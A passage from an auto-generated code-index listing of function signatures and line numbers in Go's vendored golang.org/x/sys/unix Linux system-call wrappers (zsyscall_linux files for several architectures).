int, err error) { function fchmodat (line 25) | func fchmodat(dirfd int, path string, mode uint32) (err error) { function fchmodat2 (line 40) | func fchmodat2(dirfd int, path string, mode uint32, flags int) (err erro... function ioctl (line 55) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 65) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function Linkat (line 75) | func Linkat(olddirfd int, oldpath string, newdirfd int, newpath string, ... function openat (line 95) | func openat(dirfd int, path string, flags int, mode uint32) (fd int, err... function openat2 (line 111) | func openat2(dirfd int, path string, open_how *OpenHow, size int) (fd in... function pipe2 (line 127) | func pipe2(p *[2]_C_int, flags int) (err error) { function ppoll (line 137) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Readlinkat (line 148) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Symlinkat (line 170) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Unlinkat (line 190) | func Unlinkat(dirfd int, path string, flags int) (err error) { function utimensat (line 205) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function Getcwd (line 220) | func Getcwd(buf []byte) (n int, err error) { function wait4 (line 237) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function Waitid (line 248) | func Waitid(idType int, id int, info *Siginfo, options int, rusage *Rusa... function KeyctlInt (line 258) | func KeyctlInt(cmd int, arg2 int, arg3 int, arg4 int, arg5 int) (ret int... function KeyctlBuffer (line 269) | func KeyctlBuffer(cmd int, arg2 int, buf []byte, arg5 int) (ret int, err... function keyctlJoin (line 286) | func keyctlJoin(cmd int, arg2 string) (ret int, err error) { function keyctlSearch (line 302) | func keyctlSearch(cmd int, arg2 int, arg3 string, arg4 string, arg5 int)... function keyctlIOV (line 323) | func keyctlIOV(cmd int, arg2 int, payload []Iovec, arg5 int) (err error) { function keyctlDH (line 339) | func keyctlDH(cmd int, arg2 *KeyctlDHParams, buf []byte) (ret int, err e... function keyctlRestrictKeyringByType (line 356) | func keyctlRestrictKeyringByType(cmd int, arg2 int, keyType string, rest... function keyctlRestrictKeyring (line 376) | func keyctlRestrictKeyring(cmd int, arg2 int) (err error) { function ptrace (line 386) | func ptrace(request int, pid int, addr uintptr, data uintptr) (err error) { function ptracePtr (line 396) | func ptracePtr(request int, pid int, addr uintptr, data unsafe.Pointer) ... function reboot (line 406) | func reboot(magic1 uint, magic2 uint, cmd int, arg string) (err error) { function mount (line 421) | func mount(source string, target string, fstype string, flags uintptr, d... function mountSetattr (line 446) | func mountSetattr(dirfd int, pathname string, flags uint, attr *MountAtt... function Acct (line 461) | func Acct(path string) (err error) { function AddKey (line 476) | func AddKey(keyType string, description string, payload []byte, ringid i... function Adjtimex (line 503) | func Adjtimex(buf *Timex) (state int, err error) { function Capget (line 514) | func Capget(hdr *CapUserHeader, data *CapUserData) (err error) { function Capset (line 524) | func Capset(hdr *CapUserHeader, data *CapUserData) (err error) { function Chdir (line 534) | func Chdir(path string) (err error) { function Chroot (line 549) | func Chroot(path string) (err error) { function ClockAdjtime (line 564) | func ClockAdjtime(clockid int32, buf *Timex) (state int, err error) { function ClockGetres (line 575) | func ClockGetres(clockid int32, res *Timespec) (err error) { function ClockGettime (line 585) | func ClockGettime(clockid int32, time *Timespec) (err error) { function ClockNanosleep (line 595) | func ClockNanosleep(clockid int32, flags int, request *Timespec, remain ... function Close (line 605) | func Close(fd int) (err error) { function CloseRange (line 615) | func CloseRange(first uint, last uint, flags uint) (err error) { function CopyFileRange (line 625) | func CopyFileRange(rfd int, roff *int64, wfd int, woff *int64, len int, ... function DeleteModule (line 636) | func DeleteModule(name string, flags int) (err error) { function Dup (line 651) | func Dup(oldfd int) (fd int, err error) { function Dup3 (line 662) | func Dup3(oldfd int, newfd int, flags int) (err error) { function EpollCreate1 (line 672) | func EpollCreate1(flag int) (fd int, err error) { function EpollCtl (line 683) | func EpollCtl(epfd int, op int, fd int, event *EpollEvent) (err error) { function Eventfd (line 693) | func Eventfd(initval uint, flags int) (fd int, err error) { function Exit (line 704) | func Exit(code int) { function Fchdir (line 711) | func Fchdir(fd int) (err error) { function Fchmod (line 721) | func Fchmod(fd int, mode uint32) (err error) { function Fchownat (line 731) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Fdatasync (line 746) | func Fdatasync(fd int) (err error) { function Fgetxattr (line 756) | func Fgetxattr(fd int, attr string, dest []byte) (sz int, err error) { function FinitModule (line 778) | func FinitModule(fd int, params string, flags int) (err error) { function Flistxattr (line 793) | func Flistxattr(fd int, dest []byte) (sz int, err error) { function Flock (line 810) | func Flock(fd int, how int) (err error) { function Fremovexattr (line 820) | func Fremovexattr(fd int, attr string) (err error) { function Fsetxattr (line 835) | func Fsetxattr(fd int, attr string, dest []byte, flags int) (err error) { function Fsync (line 856) | func Fsync(fd int) (err error) { function Fsmount (line 866) | func Fsmount(fd int, flags int, mountAttrs int) (fsfd int, err error) { function Fsopen (line 877) | func Fsopen(fsName string, flags int) (fd int, err error) { function Fspick (line 893) | func Fspick(dirfd int, pathName string, flags int) (fd int, err error) { function fsconfig (line 909) | func fsconfig(fd int, cmd uint, key *byte, value *byte, aux int) (err er... function Getdents (line 919) | func Getdents(fd int, buf []byte) (n int, err error) { function Getpgid (line 936) | func Getpgid(pid int) (pgid int, err error) { function Getpid (line 947) | func Getpid() (pid int) { function Getppid (line 955) | func Getppid() (ppid int) { function Getpriority (line 963) | func Getpriority(which int, who int) (prio int, err error) { function Getrandom (line 974) | func Getrandom(buf []byte, flags int) (n int, err error) { function Getrusage (line 991) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1001) | func Getsid(pid int) (sid int, err error) { function Gettid (line 1012) | func Gettid() (tid int) { function Getxattr (line 1020) | func Getxattr(path string, attr string, dest []byte) (sz int, err error) { function InitModule (line 1047) | func InitModule(moduleImage []byte, params string) (err error) { function InotifyAddWatch (line 1068) | func InotifyAddWatch(fd int, pathname string, mask uint32) (watchdesc in... function InotifyInit1 (line 1084) | func InotifyInit1(flags int) (fd int, err error) { function InotifyRmWatch (line 1095) | func InotifyRmWatch(fd int, watchdesc uint32) (success int, err error) { function Kill (line 1106) | func Kill(pid int, sig syscall.Signal) (err error) { function Klogctl (line 1116) | func Klogctl(typ int, buf []byte) (n int, err error) { function Lgetxattr (line 1133) | func Lgetxattr(path string, attr string, dest []byte) (sz int, err error) { function Listxattr (line 1160) | func Listxattr(path string, dest []byte) (sz int, err error) { function Llistxattr (line 1182) | func Llistxattr(path string, dest []byte) (sz int, err error) { function Lremovexattr (line 1204) | func Lremovexattr(path string, attr string) (err error) { function Lsetxattr (line 1224) | func Lsetxattr(path string, attr string, data []byte, flags int) (err er... function MemfdCreate (line 1250) | func MemfdCreate(name string, flags int) (fd int, err error) { function Mkdirat (line 1266) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mknodat (line 1281) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function MoveMount (line 1296) | func MoveMount(fromDirfd int, fromPathName string, toDirfd int, toPathNa... function Nanosleep (line 1316) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function OpenTree (line 1326) | func OpenTree(dfd int, fileName string, flags uint) (r int, err error) { function PerfEventOpen (line 1342) | func PerfEventOpen(attr *PerfEventAttr, pid int, cpu int, groupFd int, f... function PivotRoot (line 1353) | func PivotRoot(newroot string, putold string) (err error) { function Prctl (line 1373) | func Prctl(option int, arg2 uintptr, arg3 uintptr, arg4 uintptr, arg5 ui... function pselect6 (line 1383) | func pselect6(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timespec, ... function read (line 1394) | func read(fd int, p []byte) (n int, err error) { function Removexattr (line 1411) | func Removexattr(path string, attr string) (err error) { function Renameat2 (line 1431) | func Renameat2(olddirfd int, oldpath string, newdirfd int, newpath strin... function RequestKey (line 1451) | func RequestKey(keyType string, description string, callback string, des... function Setdomainname (line 1477) | func Setdomainname(p []byte) (err error) { function Sethostname (line 1493) | func Sethostname(p []byte) (err error) { function Setpgid (line 1509) | func Setpgid(pid int, pgid int) (err error) { function Setsid (line 1519) | func Setsid() (pid int, err error) { function Settimeofday (line 1530) | func Settimeofday(tv *Timeval) (err error) { function Setns (line 1540) | func Setns(fd int, nstype int) (err error) { function Setpriority (line 1550) | func Setpriority(which int, who int, prio int) (err error) { function Setxattr (line 1560) | func Setxattr(path string, attr string, data []byte, flags int) (err err... function signalfd (line 1586) | func signalfd(fd int, sigmask *Sigset_t, maskSize uintptr, flags int) (n... function Statx (line 1597) | func Statx(dirfd int, path string, flags int, mask int, stat *Statx_t) (... function Sync (line 1612) | func Sync() { function Syncfs (line 1619) | func Syncfs(fd int) (err error) { function Sysinfo (line 1629) | func Sysinfo(info *Sysinfo_t) (err error) { function TimerfdCreate (line 1639) | func TimerfdCreate(clockid int, flags int) (fd int, err error) { function TimerfdGettime (line 1650) | func TimerfdGettime(fd int, currValue *ItimerSpec) (err error) { function TimerfdSettime (line 1660) | func TimerfdSettime(fd int, flags int, newValue *ItimerSpec, oldValue *I... function Tgkill (line 1670) | func Tgkill(tgid int, tid int, sig syscall.Signal) (err error) { function Times (line 1680) | func Times(tms *Tms) (ticks uintptr, err error) { function Umask (line 1691) | func Umask(mask int) (oldmask int) { function Uname (line 1699) | func Uname(buf *Utsname) (err error) { function Unmount (line 1709) | func Unmount(target string, flags int) (err error) { function Unshare (line 1724) | func Unshare(flags int) (err error) { function write (line 1734) | func write(fd int, p []byte) (n int, err error) { function exitThread (line 1751) | func exitThread(code int) (err error) { function readv (line 1761) | func readv(fd int, iovs []Iovec) (n int, err error) { function writev (line 1778) | func writev(fd int, iovs []Iovec) (n int, err error) { function preadv (line 1795) | func preadv(fd int, iovs []Iovec, offs_l uintptr, offs_h uintptr) (n int... function pwritev (line 1812) | func pwritev(fd int, iovs []Iovec, offs_l uintptr, offs_h uintptr) (n in... function preadv2 (line 1829) | func preadv2(fd int, iovs []Iovec, offs_l uintptr, offs_h uintptr, flags... function pwritev2 (line 1846) | func pwritev2(fd int, iovs []Iovec, offs_l uintptr, offs_h uintptr, flag... function munmap (line 1863) | func munmap(addr uintptr, length uintptr) (err error) { function mremap (line 1873) | func mremap(oldaddr uintptr, oldlength uintptr, newlength uintptr, flags... function Madvise (line 1884) | func Madvise(b []byte, advice int) (err error) { function Mprotect (line 1900) | func Mprotect(b []byte, prot int) (err error) { function Mlock (line 1916) | func Mlock(b []byte) (err error) { function Mlockall (line 1932) | func Mlockall(flags int) (err error) { function Msync (line 1942) | func Msync(b []byte, flags int) (err error) { function Munlock (line 1958) | func Munlock(b []byte) (err error) { function Munlockall (line 1974) | func Munlockall() (err error) { function faccessat (line 1984) | func faccessat(dirfd int, path string, mode uint32) (err error) { function Faccessat2 (line 1999) | func Faccessat2(dirfd int, path string, mode uint32, flags int) (err err... function nameToHandleAt (line 2014) | func nameToHandleAt(dirFD int, pathname string, fh *fileHandle, mountID ... function openByHandleAt (line 2029) | func openByHandleAt(mountFD int, fh *fileHandle, flags int) (fd int, err... function ProcessVMReadv (line 2040) | func ProcessVMReadv(pid int, localIov []Iovec, remoteIov []RemoteIovec, ... function ProcessVMWritev (line 2063) | func ProcessVMWritev(pid int, localIov []Iovec, remoteIov []RemoteIovec,... function PidfdOpen (line 2086) | func PidfdOpen(pid int, flags int) (fd int, err error) { function PidfdGetfd (line 2097) | func PidfdGetfd(pidfd int, targetfd int, flags int) (fd int, err error) { function PidfdSendSignal (line 2108) | func PidfdSendSignal(pidfd int, sig Signal, info *Siginfo, flags int) (e... function shmat (line 2118) | func shmat(id int, addr uintptr, flag int) (ret uintptr, err error) { function shmctl (line 2129) | func shmctl(id int, cmd int, buf *SysvShmDesc) (result int, err error) { function shmdt (line 2140) | func shmdt(addr uintptr) (err error) { function shmget (line 2150) | func shmget(key int, size int, flag int) (id int, err error) { function getitimer (line 2161) | func getitimer(which int, currValue *Itimerval) (err error) { function setitimer (line 2171) | func setitimer(which int, newValue *Itimerval, oldValue *Itimerval) (err... function rtSigprocmask (line 2181) | func rtSigprocmask(how int, set *Sigset_t, oldset *Sigset_t, sigsetsize ... function getresuid (line 2191) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 2198) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function schedSetattr (line 2205) | func schedSetattr(pid int, attr *SchedAttr, flags uint) (err error) { function schedGetattr (line 2215) | func schedGetattr(pid int, attr *SchedAttr, size uint, flags uint) (err ... function Cachestat (line 2225) | func Cachestat(fd uint, crange *CachestatRange, cstat *Cachestat_t, flag... FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_386.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Ftruncate (line 110) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 120) | func Getegid() (egid int) { function Geteuid (line 128) | func Geteuid() (euid int) { function Getgid (line 136) | func Getgid() (gid int) { function Getuid (line 144) | func Getuid() (uid int) { function Ioperm (line 152) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 162) | func Iopl(level int) (err error) { function Lchown (line 172) | func Lchown(path string, uid int, gid int) (err error) { function Lstat (line 187) | func Lstat(path string, stat *Stat_t) (err error) { function pread (line 202) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 219) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 236) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function sendfile (line 256) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 267) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 278) | func setfsuid(uid int) (prev int, err error) { function Splice (line 289) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Stat (line 300) | func Stat(path string, stat *Stat_t) (err error) { function SyncFileRange (line 315) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 325) | func Truncate(path string, length int64) (err error) { function Ustat (line 340) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function getgroups (line 350) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 361) | func setgroups(n int, list *_Gid_t) (err error) { function Select (line 371) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function mmap2 (line 382) | func mmap2(addr uintptr, length uintptr, prot int, flags int, fd int, pa... function Pause (line 393) | func Pause() (err error) { function getrlimit (line 403) | func getrlimit(resource int, rlim *rlimit32) (err error) { function futimesat (line 413) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 428) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 438) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 449) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 464) | func utimes(path string, times *[2]Timeval) (err error) { function Alarm (line 479) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_amd64.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 110) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 120) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 130) | func Getegid() (egid int) { function Geteuid (line 138) | func Geteuid() (euid int) { function Getgid (line 146) | func Getgid() (gid int) { function Getrlimit (line 154) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 164) | func Getuid() (uid int) { function Ioperm (line 172) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 182) | func Iopl(level int) (err error) { function Lchown (line 192) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 207) | func Listen(s int, n int) (err error) { function MemfdSecret (line 217) | func MemfdSecret(flags int) (fd int, err error) { function Pause (line 228) | func Pause() (err error) { function pread (line 238) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 255) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 272) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 292) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function sendfile (line 303) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 314) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 325) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 336) | func Shutdown(fd int, how int) (err error) { function Splice (line 346) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Statfs (line 357) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 372) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 382) | func Truncate(path string, length int64) (err error) { function Ustat (line 397) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 407) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 418) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 428) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 438) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 449) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 459) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 469) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 479) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 490) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 500) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 510) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 520) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 537) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 553) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 564) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 575) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function futimesat (line 586) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Utime (line 601) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 616) | func utimes(path string, times *[2]Timeval) (err error) { function kexecFileLoad (line 631) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... function Alarm (line 646) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_arm.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function accept4 (line 48) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 59) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 69) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 79) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 90) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 100) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 110) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 120) | func socket(domain int, typ int, proto int) (fd int, err error) { function getpeername (line 131) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 141) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function socketpair (line 184) | func socketpair(domain int, typ int, flags int, fd *[2]int32) (err error) { function recvmsg (line 194) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 205) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function EpollWait (line 216) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fchown (line 233) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 243) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 253) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Getegid (line 268) | func Getegid() (egid int) { function Geteuid (line 276) | func Geteuid() (euid int) { function Getgid (line 284) | func Getgid() (gid int) { function Getuid (line 292) | func Getuid() (uid int) { function Lchown (line 300) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 315) | func Listen(s int, n int) (err error) { function Lstat (line 325) | func Lstat(path string, stat *Stat_t) (err error) { function Pause (line 340) | func Pause() (err error) { function Renameat (line 350) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function sendfile (line 370) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Select (line 381) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function setfsgid (line 392) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 403) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 414) | func Shutdown(fd int, how int) (err error) { function Splice (line 424) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Stat (line 435) | func Stat(path string, stat *Stat_t) (err error) { function Ustat (line 450) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function futimesat (line 460) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 475) | func Gettimeofday(tv *Timeval) (err error) { function utimes (line 485) | func utimes(path string, times *[2]Timeval) (err error) { function pread (line 500) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 517) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Truncate (line 534) | func Truncate(path string, length int64) (err error) { function Ftruncate (line 549) | func Ftruncate(fd int, length int64) (err error) { function mmap2 (line 559) | func mmap2(addr uintptr, length uintptr, prot int, flags int, fd int, pa... function getrlimit (line 570) | func getrlimit(resource int, rlim *rlimit32) (err error) { function armSyncFileRange (line 580) | func armSyncFileRange(fd int, flags int, off int64, n int64) (err error) { function kexecFileLoad (line 590) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_arm64.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 110) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 120) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 130) | func Getegid() (egid int) { function Geteuid (line 138) | func Geteuid() (euid int) { function Getgid (line 146) | func Getgid() (gid int) { function getrlimit (line 154) | func getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 164) | func Getuid() (uid int) { function Listen (line 172) | func Listen(s int, n int) (err error) { function MemfdSecret (line 182) | func MemfdSecret(flags int) (fd int, err error) { function pread (line 193) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 210) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 227) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 247) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function sendfile (line 258) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 269) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 280) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 291) | func Shutdown(fd int, how int) (err error) { function Splice (line 301) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Statfs (line 312) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 327) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 337) | func Truncate(path string, length int64) (err error) { function accept4 (line 352) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 363) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 373) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 383) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 394) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 404) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 414) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 424) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 435) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 445) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 455) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 465) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 482) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 498) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 509) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 520) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function Gettimeofday (line 531) | func Gettimeofday(tv *Timeval) (err error) { function kexecFileLoad (line 541) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_loong64.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstatfs (line 85) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 95) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 105) | func Getegid() (egid int) { function Geteuid (line 113) | func Geteuid() (euid int) { function Getgid (line 121) | func Getgid() (gid int) { function Getuid (line 129) | func Getuid() (uid int) { function Listen (line 137) | func Listen(s int, n int) (err error) { function pread (line 147) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 164) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Seek (line 181) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function sendfile (line 192) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 203) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 214) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 225) | func Shutdown(fd int, how int) (err error) { function Splice (line 235) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Statfs (line 246) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 261) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 271) | func Truncate(path string, length int64) (err error) { function accept4 (line 286) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 297) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 307) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 317) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 328) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 338) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 348) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 358) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 369) | func socketpair(domain int, 